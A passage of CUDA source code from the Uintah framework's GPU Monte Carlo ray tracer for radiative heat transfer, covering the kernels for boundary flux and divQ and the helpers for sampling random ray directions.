// Sets ray direction. 1: (0.7071,0.7071, 0), 2: (0.7071, 0, 0.7071), 3: (0, 0.7071, 0.7071) // 4: (0.7071, 0.7071, 7071), 5: (1,0,0) 6: (0, 1, 0), 7: (0,0,1) #define SIGN 1 // Multiply the FIXED_RAY_DIRs by value //__________________________________ // To Do // - Investigate using multiple GPUs per node. // - Implement fixed and dynamic ROI. // - dynamic block size? // - Implement labelNames in unified memory. 
// - investigate the performance with different patch configurations // - deterministic random numbers // - Ray steps //__________________________________ // // To use cuda-gdb on a single GPU you must set the environmental variable // CUDA_DEBUGGER_SOFTWARE_PREEMPTION=1 // // mpirun -np 1 xterm -e cuda-gdb sus -gpu -nthreads 2 <args> //__________________________________ namespace Uintah { //--------------------------------------------------------------------------- // Kernel: The GPU ray tracer kernel //--------------------------------------------------------------------------- template< class T> __global__ void rayTraceKernel( dim3 dimGrid, dim3 dimBlock, const int matl, levelParams level, patchParams patch, curandState* randNumStates, RMCRT_flags RT_flags, int curTimeStep, GPUDataWarehouse* abskg_gdw, GPUDataWarehouse* sigmaT4_gdw, GPUDataWarehouse* cellType_gdw, GPUDataWarehouse* old_gdw, GPUDataWarehouse* new_gdw ) { // Not used right now // int blockID = blockIdx.x + blockIdx.y * gridDim.x + gridDim.x * gridDim.y * blockIdx.z; // int threadID = threadIdx.x + blockDim.x * threadIdx.y + (blockDim.x * blockDim.y) * threadIdx.z; // calculate the thread indices int tidX = threadIdx.x + blockIdx.x * blockDim.x + patch.loEC.x; int tidY = threadIdx.y + blockIdx.y * blockDim.y + patch.loEC.y; const GPUGridVariable< T > sigmaT4OverPi; const GPUGridVariable< T > abskg; // Need to use getRegion() to get the data const GPUGridVariable<int> cellType; GPUGridVariable<double> divQ; GPUGridVariable<GPUStencil7> boundFlux; GPUGridVariable<double> radiationVolQ; // sigmaT4_gdw->print(); sigmaT4_gdw->getLevel( sigmaT4OverPi, "sigmaT4", matl, level.index); cellType_gdw->getLevel( cellType, "cellType", matl, level.index); if(RT_flags.usingFloats){ abskg_gdw->getLevel( abskg, "abskgRMCRT", matl, level.index); }else{ abskg_gdw->getLevel( abskg, "abskg", matl, level.index); } if( RT_flags.modifies_divQ ){ new_gdw->getModifiable( divQ, "divQ", patch.ID, matl ); new_gdw->getModifiable( boundFlux, "RMCRTboundFlux", patch.ID, matl ); new_gdw->getModifiable( radiationVolQ,"radiationVolq", patch.ID, matl ); }else{ new_gdw->get( divQ, "divQ", patch.ID, matl ); // these should be allocateAndPut() calls new_gdw->get( boundFlux, "RMCRTboundFlux", patch.ID, matl ); new_gdw->get( radiationVolQ,"radiationVolq", patch.ID, matl ); // Extra Cell Loop if ( (tidX >= patch.loEC.x) && (tidY >= patch.loEC.y) && (tidX < patch.hiEC.x) && (tidY < patch.hiEC.y) ) { // patch boundary check #pragma unroll for (int z = patch.loEC.z; z < patch.hiEC.z; z++) { // loop through z slices GPUIntVector c = make_int3(tidX, tidY, z); divQ[c] = 0.0; radiationVolQ[c] = 0.0; boundFlux[c].initialize(0.0); } } } //__________________________________ // Sanity checks #if 0 if (isThread0()) { printf(" GPUVariable Sanity check level: %i, patch: %i \n",level.index, patch.ID); } #endif GPUVariableSanityCK(abskg, patch.loEC, patch.hiEC); GPUVariableSanityCK(sigmaT4OverPi, patch.loEC, patch.hiEC); bool doLatinHyperCube = (RT_flags.rayDirSampleAlgo == LATIN_HYPER_CUBE); const int nFluxRays = RT_flags.nFluxRays; // for readability // This rand_i array is only needed for LATIN_HYPER_CUBE scheme const int size = 1000; int rand_i[ size ]; //Give it a buffer room of 1000. But we should only use nFluxRays items in it. //Hopefully this 1000 will always be greater than nFluxRays. 
//TODO, a 4D array is probably better here (x,y,z, ray#), saves //on memory (no unused buffer) and computation time (don't need to compute //the rays twice) if (nFluxRays > size) { printf("\n\n\nERROR! rayTraceKernel() - Cannot have more rays than the rand_i array size. nFluxRays is %d, size of the array is.%d\n\n\n", nFluxRays, size); //We have to return, otherwise the upcoming math in rayDirectionHyperCube_cellFaceDevice will generate nan values. return; } //______________________________________________________________________ // R A D I O M E T E R //______________________________________________________________________ // TO BE FILLED IN //______________________________________________________________________ // B O U N D A R Y F L U X //______________________________________________________________________ setupRandNumsSeedAndSequences(randNumStates, (dimGrid.x * dimGrid.y * dimGrid.z * dimBlock.x * dimBlock.y * dimBlock.z), patch.ID, curTimeStep); if( RT_flags.solveBoundaryFlux ){ __shared__ int3 dirIndexOrder[6]; __shared__ int3 dirSignSwap[6]; //_____________________________________________ // Ordering for Surface Method // This block of code is used to properly place ray origins, and orient ray directions // onto the correct face. This is necessary, because by default, the rays are placed // and oriented onto a default face, then require adjustment onto the proper face. dirIndexOrder[EAST] = make_int3(2, 1, 0); dirIndexOrder[WEST] = make_int3(2, 1, 0); dirIndexOrder[NORTH] = make_int3(0, 2, 1); dirIndexOrder[SOUTH] = make_int3(0, 2, 1); dirIndexOrder[TOP] = make_int3(0, 1, 2); dirIndexOrder[BOT] = make_int3(0, 1, 2); // Ordering is slightly different from 6Flux since here, rays pass through origin cell from the inside faces. dirSignSwap[EAST] = make_int3(-1, 1, 1); dirSignSwap[WEST] = make_int3( 1, 1, 1); dirSignSwap[NORTH] = make_int3( 1, -1, 1); dirSignSwap[SOUTH] = make_int3( 1, 1, 1); dirSignSwap[TOP] = make_int3( 1, 1, -1); dirSignSwap[BOT] = make_int3( 1, 1, 1); __syncthreads(); //__________________________________ // GPU equivalent of GridIterator loop - calculate sets of rays per thread if ( (tidX >= patch.lo.x) && (tidY >= patch.lo.y) && (tidX < patch.hi.x) && (tidY < patch.hi.y) ) { // patch boundary check #pragma unroll for (int z = patch.lo.z; z < patch.hi.z; z++) { // loop through z slices GPUIntVector origin = make_int3(tidX, tidY, z); // for each thread //get a new set of random numbers if (doLatinHyperCube){ randVectorDevice(rand_i, nFluxRays, randNumStates); } boundFlux[origin].initialize(0.0); BoundaryFaces boundaryFaces; // which surrounding cells are boundaries boundFlux[origin].p = has_a_boundaryDevice(origin, cellType, boundaryFaces); GPUPoint CC_pos = level.getCellPosition(origin); //__________________________________ // Loop over boundary faces of the cell and compute incident radiative flux #pragma unroll for( int i = 0; i<boundaryFaces.size(); i++) { int RayFace = boundaryFaces.faceArray[i]; int UintahFace[6] = {WEST,EAST,SOUTH,NORTH,BOT,TOP}; double sumI = 0; double sumProjI = 0; double sumI_prev = 0; double sumCosTheta = 0; // used to force sumCosTheta/nRays == 0.5 or sum (d_Omega * cosTheta) == pi //__________________________________ // Flux ray loop #pragma unroll for (int iRay=0; iRay < nFluxRays; iRay++){ GPUVector direction_vector; GPUVector rayOrigin; double cosTheta; if ( doLatinHyperCube ){ // Latin-Hyper-Cube sampling rayDirectionHyperCube_cellFaceDevice( randNumStates, origin, dirIndexOrder[RayFace], dirSignSwap[RayFace], iRay, 
direction_vector, cosTheta, rand_i[iRay], iRay, nFluxRays); } else { rayDirection_cellFaceDevice( randNumStates, origin, dirIndexOrder[RayFace], dirSignSwap[RayFace], iRay, direction_vector, cosTheta ); } rayLocation_cellFaceDevice( randNumStates, RayFace, patch.dx, CC_pos, rayOrigin); updateSumIDevice< T >( level, direction_vector, rayOrigin, origin, patch.dx, sigmaT4OverPi, abskg, cellType, sumI, randNumStates, RT_flags); sumProjI += cosTheta * (sumI - sumI_prev); // must subtract sumI_prev, since sumI accumulates intensity sumCosTheta += cosTheta; sumI_prev = sumI; } // end of flux ray loop sumProjI = sumProjI * (double) nFluxRays/sumCosTheta/2.0; // This operation corrects for error in the first moment over a // half range of the solid angle (Modest Radiative Heat Transfer page 545 1st edition) //__________________________________ // Compute Net Flux to the boundary int face = UintahFace[RayFace]; boundFlux[origin][ face ] = sumProjI * 2 *M_PI/(double)nFluxRays; #if ( DEBUG == 2 ) if( isDbgCellDevice(origin) ) { printf( "\n [%d, %d, %d] face: %d sumProjI: %g BoundaryFlux: %g\n", origin.x, origin.y, origin.z, face, sumProjI, boundFlux[origin][ face ]); } #endif } // boundary faces loop } // z slices loop } // X-Y Thread loop } //______________________________________________________________________ // S O L V E D I V Q //______________________________________________________________________ //Setup the original seeds so we can get the same random numbers again. setupRandNumsSeedAndSequences(randNumStates, (dimGrid.x * dimGrid.y * dimGrid.z * dimBlock.x * dimBlock.y * dimBlock.z), patch.ID, curTimeStep); if( RT_flags.solveDivQ ){ const int nDivQRays = RT_flags.nDivQRays; // for readability // GPU equivalent of GridIterator loop - calculate sets of rays per thread if ( (tidX >= patch.lo.x) && (tidY >= patch.lo.y) && (tidX < patch.hi.x) && (tidY < patch.hi.y) ) { // patch boundary check #pragma unroll for (int z = patch.lo.z; z < patch.hi.z; z++) { // loop through z slices GPUIntVector origin = make_int3(tidX, tidY, z); // for each thread //Get the same set of random numbers as we had before. We need the same rays. if (doLatinHyperCube){ randVectorDevice(rand_i, nFluxRays, randNumStates); } double sumI = 0; GPUPoint CC_pos = level.getCellPosition(origin); // don't compute in intrusions and walls if( cellType[origin] != d_flowCell ){ continue; } //__________________________________ // ray loop #pragma unroll for (int iRay = 0; iRay < nDivQRays; iRay++) { GPUVector direction_vector; if ( doLatinHyperCube ){ // Latin-Hyper-Cube sampling direction_vector = findRayDirectionHyperCubeDevice(randNumStates, nDivQRays, rand_i[iRay], iRay ); }else{ // Naive Monte-Carlo sampling direction_vector = findRayDirectionDevice( randNumStates ); } GPUVector rayOrigin = rayOriginDevice( randNumStates, CC_pos, patch.dx, RT_flags.CCRays ); updateSumIDevice< T >( level, direction_vector, rayOrigin, origin, patch.dx, sigmaT4OverPi, abskg, cellType, sumI, randNumStates, RT_flags); } //Ray loop //__________________________________ // Compute divQ divQ[origin] = -4.0 * M_PI * abskg[origin] * ( sigmaT4OverPi[origin] - (sumI/RT_flags.nDivQRays) ); // radiationVolq is the incident energy per cell (W/m^3) and is necessary when particle heat transfer models (i.e. 
Shaddix) are used radiationVolQ[origin] = 4.0 * M_PI * abskg[origin] * (sumI/RT_flags.nDivQRays) ; #if ( DEBUG == 1) if( isDbgCellDevice( origin ) ){ printf( "\n [%d, %d, %d] sumI: %1.16e divQ: %1.16e radiationVolq: %1.16e abskg: %1.16e, sigmaT4: %1.16e \n", origin.x, origin.y, origin.z, sumI,divQ[origin], radiationVolQ[origin],abskg[origin], sigmaT4OverPi[origin]); } #endif } // end z-slice loop } // end domain boundary check } // solve divQ } // end ray trace kernel //--------------------------------------------------------------------------- // Kernel: The GPU ray tracer data onion kernel //--------------------------------------------------------------------------- // hard-wired for 2-levels now, but this should be fast and fixes __constant__ levelParams d_levels[d_MAXLEVELS]; template< class T> __global__ #if NDEBUG //Uinth has a DNDEBUG compiler defined flag in normal trunk builds. Debug builds have no compiler flags we can capture. __launch_bounds__(640, 1) // For 96 registers with 320 threads. Allows two kernels to fit within an SM. // Seems to be the performance sweet spot in release mode. #endif void rayTraceDataOnionKernel( dim3 dimGrid, dim3 dimBlock, int matl, patchParams finePatch, gridParams gridP, GPUIntVector fineLevel_ROI_Lo, GPUIntVector fineLevel_ROI_Hi, int3* regionLo, int3* regionHi, curandState* randNumStates, RMCRT_flags RT_flags, int curTimeStep, GPUDataWarehouse* abskg_gdw, GPUDataWarehouse* sigmaT4_gdw, GPUDataWarehouse* cellType_gdw, GPUDataWarehouse* old_gdw, GPUDataWarehouse* new_gdw ) { #if 0 if (tidX == 1 && tidY == 1) { printf("\nGPU levelParams\n"); printf("Level-0 "); d_levels[0].print(); printf("Level-1 "); d_levels[1].print(); } #endif int maxLevels = gridP.maxLevels; int fineL = maxLevels - 1; levelParams fineLevel = d_levels[fineL]; //compute startCell and endCell relative to the block int startCell = RT_flags.startCell + ((RT_flags.endCell - RT_flags.startCell) / gridDim.x) * blockIdx.x; int endCell = RT_flags.startCell + ((RT_flags.endCell - RT_flags.startCell) / gridDim.x) * (blockIdx.x + 1); RT_flags.startCell = startCell; RT_flags.endCell = endCell; //__________________________________ // const GPUGridVariable<T> abskg[d_MAXLEVELS]; const GPUGridVariable<T> sigmaT4OverPi[d_MAXLEVELS]; const GPUGridVariable<int> cellType[d_MAXLEVELS]; // new_gdw->print(); //__________________________________ // coarse level data for the entire level for (int l = 0; l < maxLevels; ++l) { if (d_levels[l].hasFinerLevel) { if(RT_flags.usingFloats){ abskg_gdw->getLevel( abskg[l], "abskgRMCRT", matl, l); } else { abskg_gdw->getLevel( abskg[l], "abskg", matl, l); } sigmaT4_gdw->getLevel( sigmaT4OverPi[l], "sigmaT4", matl, l); cellType_gdw->getLevel( cellType[l], "cellType", matl, l); GPUVariableSanityCK(abskg[l], d_levels[l].regionLo,d_levels[l].regionHi); GPUVariableSanityCK(sigmaT4OverPi[l],d_levels[l].regionLo,d_levels[l].regionHi); } } //__________________________________ // fine level data for the region of interest. 
// ToDo: replace get with getRegion() calls so // so the halo can be > 0 if ( RT_flags.whichROI_algo == patch_based ) { if(RT_flags.usingFloats){ abskg_gdw->get(abskg[fineL], "abskgRMCRT", finePatch.ID, matl, fineL); } else { abskg_gdw->get(abskg[fineL], "abskg", finePatch.ID, matl, fineL); } sigmaT4_gdw->get(sigmaT4OverPi[fineL], "sigmaT4", finePatch.ID, matl, fineL); cellType_gdw->get(cellType[fineL], "cellType", finePatch.ID, matl, fineL); GPUVariableSanityCK(abskg[fineL], fineLevel_ROI_Lo,fineLevel_ROI_Hi); GPUVariableSanityCK(sigmaT4OverPi[fineL],fineLevel_ROI_Lo,fineLevel_ROI_Hi); } GPUGridVariable<double> divQ_fine; GPUGridVariable<GPUStencil7> boundFlux_fine; GPUGridVariable<double> radiationVolQ_fine; //__________________________________ // fine level data for this patch if( RT_flags.modifies_divQ ){ new_gdw->getModifiable( divQ_fine, "divQ", finePatch.ID, matl, fineL ); new_gdw->getModifiable( boundFlux_fine, "RMCRTboundFlux", finePatch.ID, matl, fineL ); new_gdw->getModifiable( radiationVolQ_fine,"radiationVolq", finePatch.ID, matl, fineL ); }else{ new_gdw->get( divQ_fine, "divQ", finePatch.ID, matl, fineL ); // these should be allocateAntPut() calls new_gdw->get( boundFlux_fine, "RMCRTboundFlux", finePatch.ID, matl, fineL ); new_gdw->get( radiationVolQ_fine,"radiationVolq", finePatch.ID, matl, fineL ); //__________________________________ // initialize Extra Cell Loop int3 finePatchSize = make_int3(finePatch.hi.x - finePatch.lo.x, finePatch.hi.y - finePatch.lo.y, finePatch.hi.z - finePatch.lo.z); unsigned short threadID = threadIdx.x + RT_flags.startCell; GPUIntVector c = make_int3((threadID % finePatchSize.x) + finePatch.lo.x, ((threadID % (finePatchSize.x * finePatchSize.y)) / (finePatchSize.x)) + finePatch.lo.y, (threadID / (finePatchSize.x * finePatchSize.y)) + finePatch.lo.z); while (threadID < RT_flags.endCell) { divQ_fine[c] = 0.0; radiationVolQ_fine[c] = 0.0; boundFlux_fine[c].initialize(0.0); //move to the next cell threadID += blockDim.x; c.x = (threadID % finePatchSize.x) + finePatch.lo.x; c.y = ((threadID % (finePatchSize.x * finePatchSize.y)) / (finePatchSize.x)) + finePatch.lo.y; c.z = (threadID / (finePatchSize.x * finePatchSize.y)) + finePatch.lo.z; } } //We're going to change thread to cell mappings, so make sure all vars have been initialized before continuing __syncthreads(); //__________________________________ // bool doLatinHyperCube = (RT_flags.rayDirSampleAlgo == LATIN_HYPER_CUBE); const int nFluxRays = RT_flags.nFluxRays; // for readability // This rand_i array is only needed for LATIN_HYPER_CUBE scheme //const int size = 500; int rand_i[ d_MAX_RAYS ]; //Give it a buffer room for many rays. //Hopefully this 500 will always be greater than the number of rays. //TODO, a 4D array is probably better here (x,y,z, ray#), saves //on memory (no unused buffer) if (nFluxRays > d_MAX_RAYS || RT_flags.nDivQRays > d_MAX_RAYS) { printf("\n\n\nERROR! rayTraceKernel() - Cannot have more rays than the rand_i array size. Flux rays: %d, divQ rays: %d, size of the array is.%d\n\n\n", nFluxRays, RT_flags.nFluxRays, d_MAX_RAYS); //We have to return, otherwise the upcoming math in rayDirectionHyperCube_cellFaceDevice will generate nan values. 
return; } setupRandNumsSeedAndSequences(randNumStates, (dimGrid.x * dimGrid.y * dimGrid.z * dimBlock.x * dimBlock.y * dimBlock.z), finePatch.ID, curTimeStep); //______________________________________________________________________ // R A D I O M E T E R //______________________________________________________________________ // TO BE FILLED IN //______________________________________________________________________ // B O U N D A R Y F L U X //______________________________________________________________________ if( RT_flags.solveBoundaryFlux ){ int3 dirIndexOrder[6]; int3 dirSignSwap[6]; //_____________________________________________ // Ordering for Surface Method // This block of code is used to properly place ray origins, and orient ray directions // onto the correct face. This is necessary, because by default, the rays are placed // and oriented onto a default face, then require adjustment onto the proper face. dirIndexOrder[EAST] = make_int3(2, 1, 0); dirIndexOrder[WEST] = make_int3(2, 1, 0); dirIndexOrder[NORTH] = make_int3(0, 2, 1); dirIndexOrder[SOUTH] = make_int3(0, 2, 1); dirIndexOrder[TOP] = make_int3(0, 1, 2); dirIndexOrder[BOT] = make_int3(0, 1, 2); // Ordering is slightly different from 6Flux since here, rays pass through origin cell from the inside faces. dirSignSwap[EAST] = make_int3(-1, 1, 1); dirSignSwap[WEST] = make_int3( 1, 1, 1); dirSignSwap[NORTH] = make_int3( 1, -1, 1); dirSignSwap[SOUTH] = make_int3( 1, 1, 1); dirSignSwap[TOP] = make_int3( 1, 1, -1); dirSignSwap[BOT] = make_int3( 1, 1, 1); int3 finePatchSize = make_int3(finePatch.hi.x - finePatch.lo.x, finePatch.hi.y - finePatch.lo.y, finePatch.hi.z - finePatch.lo.z); unsigned short threadID = threadIdx.x + RT_flags.startCell; GPUIntVector origin = make_int3((threadID % finePatchSize.x) + finePatch.lo.x, ((threadID % (finePatchSize.x * finePatchSize.y)) / (finePatchSize.x)) + finePatch.lo.y, (threadID / (finePatchSize.x * finePatchSize.y)) + finePatch.lo.z); while (threadID < RT_flags.endCell) { //get a new set of random numbers if (doLatinHyperCube){ randVectorDevice(rand_i, nFluxRays, randNumStates); } if (cellType[fineL][origin] == d_flowCell) { // don't solve for fluxes in intrusions boundFlux_fine[origin].initialize(0.0); //FIXME: Already initialized? 
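// has_a_boundaryDevice() below records which of the six face-adjacent cells are non-flow cells; incident flux is only computed on those faces.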
BoundaryFaces boundaryFaces; // which surrounding cells are boundaries boundFlux_fine[origin].p = has_a_boundaryDevice(origin, cellType[fineL], boundaryFaces); GPUPoint CC_pos = fineLevel.getCellPosition(origin); //__________________________________ // Loop over boundary faces of the cell and compute incident radiative flux #pragma unroll for( int i = 0; i<boundaryFaces.size(); i++) { int RayFace = boundaryFaces.faceArray[i]; int UintahFace[6] = {WEST,EAST,SOUTH,NORTH,BOT,TOP}; double sumI = 0; double sumProjI = 0; double sumI_prev = 0; double sumCosTheta = 0; // used to force sumCosTheta/nRays == 0.5 or sum (d_Omega * cosTheta) == pi //__________________________________ // Flux ray loop #pragma unroll for (int iRay=0; iRay < nFluxRays; iRay++){ GPUVector direction_vector; GPUVector rayOrigin; double cosTheta; if ( doLatinHyperCube ){ // Latin-Hyper-Cube sampling rayDirectionHyperCube_cellFaceDevice( randNumStates, origin, dirIndexOrder[RayFace], dirSignSwap[RayFace], iRay, direction_vector, cosTheta, rand_i[iRay], iRay, nFluxRays); } else{ // Naive Monte-Carlo sampling rayDirection_cellFaceDevice( randNumStates, origin, dirIndexOrder[RayFace], dirSignSwap[RayFace], iRay, direction_vector, cosTheta ); } rayLocation_cellFaceDevice( randNumStates, RayFace, finePatch.dx, CC_pos, rayOrigin); updateSumI_MLDevice<T>( direction_vector, rayOrigin, origin, gridP, fineLevel_ROI_Lo, fineLevel_ROI_Hi, regionLo, regionHi, sigmaT4OverPi, abskg, cellType, sumI, randNumStates, RT_flags); sumProjI += cosTheta * (sumI - sumI_prev); // must subtract sumI_prev, since sumI accumulates intensity sumCosTheta += cosTheta; sumI_prev = sumI; } // end of flux ray loop sumProjI = sumProjI * (double) RT_flags.nFluxRays/sumCosTheta/2.0; // This operation corrects for error in the first moment over a half range of the solid angle (Modest Radiative Heat Transfer page 545 1rst edition) //__________________________________ // Compute Net Flux to the boundary int face = UintahFace[RayFace]; boundFlux_fine[origin][ face ] = sumProjI * 2 *M_PI/ (double) RT_flags.nFluxRays; //==========TESTING========== #if (DEBUG == 2) if( isDbgCell(origin) ) { printf( "\n [%d, %d, %d] face: %d sumProjI: %g BoundaryFlux: %g\n", origin.x, origin.y, origin.z, face, sumProjI, boundFlux_fine[origin][ face ] ); } #endif //===========TESTING========== } // boundary faces loop } //end if checking for intrusions //move to the next cell threadID += blockDim.x; origin.x = (threadID % finePatchSize.x) + finePatch.lo.x; origin.y = ((threadID % (finePatchSize.x * finePatchSize.y)) / (finePatchSize.x)) + finePatch.lo.y; origin.z = (threadID / (finePatchSize.x * finePatchSize.y)) + finePatch.lo.z; } // while loop } //______________________________________________________________________ // S O L V E D I V Q //______________________________________________________________________ if( RT_flags.solveDivQ ) { // GPU equivalent of GridIterator loop - calculate sets of rays per thread int3 finePatchSize = make_int3(finePatch.hi.x - finePatch.lo.x, finePatch.hi.y - finePatch.lo.y, finePatch.hi.z - finePatch.lo.z); unsigned short threadID = threadIdx.x + RT_flags.startCell; GPUIntVector origin = make_int3((threadID % finePatchSize.x) + finePatch.lo.x, ((threadID % (finePatchSize.x * finePatchSize.y)) / (finePatchSize.x)) + finePatch.lo.y, (threadID / (finePatchSize.x * finePatchSize.y)) + finePatch.lo.z); while (threadID < RT_flags.endCell) { // don't compute in intrusions and walls if(cellType[fineL][origin] != d_flowCell ){ continue; } GPUPoint CC_pos = 
d_levels[fineL].getCellPosition(origin); #if( DEBUG == 1 ) if( isDbgCellDevice( origin ) ){ printf(" origin[%i,%i,%i] finePatchID: %i \n", origin.x, origin.y, origin.z, finePatch.ID); } #endif double sumI = 0; //__________________________________ // ray loop #pragma unroll for (int iRay = 0; iRay < RT_flags.nDivQRays; iRay++) { GPUVector ray_direction; if ( doLatinHyperCube ){ // Latin-Hyper-Cube sampling ray_direction = findRayDirectionHyperCubeDevice(randNumStates, RT_flags.nDivQRays, rand_i[iRay], iRay ); }else{ // Naive Monte-Carlo sampling ray_direction = findRayDirectionDevice( randNumStates ); } GPUVector rayOrigin = rayOriginDevice( randNumStates, CC_pos, d_levels[fineL].Dx , RT_flags.CCRays ); updateSumI_MLDevice<T>(ray_direction, rayOrigin, origin, gridP, fineLevel_ROI_Lo, fineLevel_ROI_Hi, regionLo, regionHi, sigmaT4OverPi, abskg, cellType, sumI, randNumStates, RT_flags); } //Ray loop //__________________________________ // Compute divQ divQ_fine[origin] = -4.0 * M_PI * abskg[fineL][origin] * ( sigmaT4OverPi[fineL][origin] - (sumI/RT_flags.nDivQRays) ); // radiationVolq is the incident energy per cell (W/m^3) and is necessary when particle heat transfer models (i.e. Shaddix) are used radiationVolQ_fine[origin] = 4.0 * M_PI * (sumI/RT_flags.nDivQRays); #if (DEBUG == 1) if( isDbgCellDevice(origin) ){ printf( "\n [%d, %d, %d] sumI: %g divQ: %g radiationVolq: %g abskg: %g, sigmaT4: %g \n", origin.x, origin.y, origin.z, sumI,divQ_fine[origin], radiationVolQ_fine[origin],abskg[fineL][origin], sigmaT4OverPi[fineL][origin]); } #endif //move to the next cell threadID += blockDim.x; origin.x = (threadID % finePatchSize.x) + finePatch.lo.x; origin.y = ((threadID % (finePatchSize.x * finePatchSize.y)) / (finePatchSize.x)) + finePatch.lo.y; origin.z = (threadID / (finePatchSize.x * finePatchSize.y)) + finePatch.lo.z; //printf("Got [%d,%d,%d] from %d on counter %d\n", origin.x, origin.y, origin.z, threadID, cellCounter); } // end while loop } // solve divQ } //______________________________________________________________________ // //______________________________________________________________________ __device__ GPUVector findRayDirectionDevice( curandState* randNumStates ) { // Random Points On Sphere // add fuzz to prevent infs in 1/dirVector calculation double plusMinus_one = 2.0 * randDblExcDevice( randNumStates ) - 1.0 + DBL_EPSILON; double r = sqrt(1.0 - plusMinus_one * plusMinus_one); // Radius of circle at z double theta = 2.0 * M_PI * randDblExcDevice( randNumStates ); // Uniform betwen 0-2Pi GPUVector dirVector; dirVector.x = r*cos(theta); // Convert to cartesian coordinates dirVector.y = r*sin(theta); dirVector.z = plusMinus_one; #if ( FIXED_RAY_DIR == 1) dirVector = make_double3(0.707106781186548, 0.707106781186548, 0.) * SIGN; #elif ( FIXED_RAY_DIR == 2 ) dirVector = make_double3(0.707106781186548, 0.0, 0.707106781186548) * SIGN; #elif ( FIXED_RAY_DIR == 3 ) dirVector = make_double3(0.0, 0.707106781186548, 0.707106781186548) * SIGN; #elif ( FIXED_RAY_DIR == 4 ) dirVector = make_double3(0.707106781186548, 0.707106781186548, 0.707106781186548) * SIGN; #elif ( FIXED_RAY_DIR == 5 ) dirVector = make_double3(1, 0, 0) * SIGN; #elif ( FIXED_RAY_DIR == 6 ) dirVector = make_double3(0, 1, 0) * SIGN; #elif ( FIXED_RAY_DIR == 7 ) dirVector = make_double3(0, 0, 1) * SIGN; #else #endif return dirVector; } //______________________________________________________________________ // Uses stochastically selected regions in polar and azimuthal space to // generate the Monte-Carlo directions. 
Samples Uniformly on a hemisphere // and as hence does not include the cosine in the sample. //______________________________________________________________________ __device__ void rayDirectionHyperCube_cellFaceDevice(curandState* randNumStates, const GPUIntVector& origin, const int3& indexOrder, const int3& signOrder, const int iRay, GPUVector& dirVector, double& cosTheta, const int bin_i, const int bin_j, const int nFluxRays) { // randomly sample within each randomly selected region (may not be needed, alternatively choose center of subregion) cosTheta = (randDblExcDevice(randNumStates) + (double) bin_i)/(double)nFluxRays; double theta = acos(cosTheta); // polar angle for the hemisphere double phi = 2.0 * M_PI * (randDblExcDevice(randNumStates) + (double) bin_j)/(double)nFluxRays; // Uniform betwen 0-2Pi cosTheta = cos(theta); //Convert to Cartesian GPUVector tmp; tmp[0] = sin(theta) * cos(phi); tmp[1] = sin(theta) * sin(phi); tmp[2] = cosTheta; //Put direction vector as coming from correct face, dirVector[0] = tmp[indexOrder.x] * signOrder.x; dirVector[1] = tmp[indexOrder.y] * signOrder.y; dirVector[2] = tmp[indexOrder.z] * signOrder.z; } //______________________________________________________________________ // __device__ GPUVector findRayDirectionHyperCubeDevice(curandState* randNumStates, const int nDivQRays, const int bin_i, const int bin_j) { // Random Points On Sphere double plusMinus_one = 2.0 *(randDblExcDevice( randNumStates ) + (double) bin_i)/nDivQRays - 1.0; // Radius of circle at z double r = sqrt(1.0 - plusMinus_one * plusMinus_one); // Uniform betwen 0-2Pi double phi = 2.0 * M_PI * (randDblExcDevice( randNumStates ) + (double) bin_j)/nDivQRays; GPUVector dirVector; dirVector[0] = r*cos(phi); // Convert to cartesian dirVector[1] = r*sin(phi); dirVector[2] = plusMinus_one; return dirVector; } //______________________________________________________________________ // Populate vector with integers which have been randomly shuffled. // This is sampling without replacement and can be used to in a // Latin-Hyper-Cube sampling scheme. The algorithm used is the // modern Fisher-Yates shuffle. //______________________________________________________________________ __device__ void randVectorDevice( int int_array[], const int size, curandState* randNumStates ){ for (int i=0; i<size; i++){ // populate sequential array from 0 to size-1 int_array[i] = i; } for (int i=size-1; i>0; i--){ // fisher-yates shuffle starting with size-1 int rand_int = randIntDevice(randNumStates, i); // Random number between 0 & i int swap = int_array[i]; int_array[i] = int_array[rand_int]; int_array[rand_int] = swap; } } //______________________________________________________________________ // Compute the Ray direction from a cell face __device__ void rayDirection_cellFaceDevice( curandState* randNumStates, const GPUIntVector& origin, const GPUIntVector& indexOrder, const GPUIntVector& signOrder, const int iRay, GPUVector& directionVector, double& cosTheta ) { // Surface Way to generate a ray direction from the positive z face double phi = 2 * M_PI * randDblDevice(randNumStates); // azimuthal angle. 
Range of 0 to 2pi double theta = acos(randDblDevice(randNumStates)); // polar angle for the hemisphere cosTheta = cos(theta); double sinTheta = sin(theta); //Convert to Cartesian GPUVector tmp; tmp[0] = sinTheta * cos(phi); tmp[1] = sinTheta * sin(phi); tmp[2] = cosTheta; // Put direction vector as coming from correct face, directionVector[0] = tmp[indexOrder[0]] * signOrder[0]; directionVector[1] = tmp[indexOrder[1]] * signOrder[1]; directionVector[2] = tmp[indexOrder[2]] * signOrder[2]; } //______________________________________________________________________ // Compute the physical location of a ray's origin __device__ GPUVector rayOriginDevice( curandState* randNumStates, const GPUPoint CC_pos, const GPUVector dx, const bool useCCRays) { GPUVector rayOrigin; if( useCCRays == false ){ rayOrigin[0] = CC_pos.x - 0.5*dx.x + randDblDevice(randNumStates) * dx.x; rayOrigin[1] = CC_pos.y - 0.5*dx.y + randDblDevice(randNumStates) * dx.y; rayOrigin[2] = CC_pos.z - 0.5*dx.z + randDblDevice(randNumStates) * dx.z; }else{ rayOrigin[0] = CC_pos.x; rayOrigin[1] = CC_pos.y; rayOrigin[2] = CC_pos.z; } return rayOrigin; } //______________________________________________________________________ // Compute the Ray location from a cell face __device__ void rayLocation_cellFaceDevice( curandState* randNumStates, const GPUIntVector& origin, const GPUIntVector &indexOrder, const GPUIntVector &shift, const double &DyDx, const double &DzDx, GPUVector& location ) { GPUVector tmp; tmp[0] = randDblDevice(randNumStates); tmp[1] = 0; tmp[2] = randDblDevice(randNumStates) * DzDx; // Put point on correct face location[0] = tmp[indexOrder[0]] + (double)shift[0]; location[1] = tmp[indexOrder[1]] + (double)shift[1] * DyDx; location[2] = tmp[indexOrder[2]] + (double)shift[2] * DzDx; location[0] += (double)origin.x; location[1] += (double)origin.y; location[2] += (double)origin.z; } //______________________________________________________________________ // // Compute the Ray location on a cell face __device__ void rayLocation_cellFaceDevice( curandState* randNumStates, const int face, const GPUVector Dx, const GPUPoint CC_pos, GPUVector& rayOrigin) { double cellOrigin[3]; // left, bottom, back corner of the cell cellOrigin[X] = CC_pos.x - 0.5 * Dx[X]; cellOrigin[Y] = CC_pos.y - 0.5 * Dx[Y]; cellOrigin[Z] = CC_pos.z - 0.5 * Dx[Z]; switch(face) { case WEST: 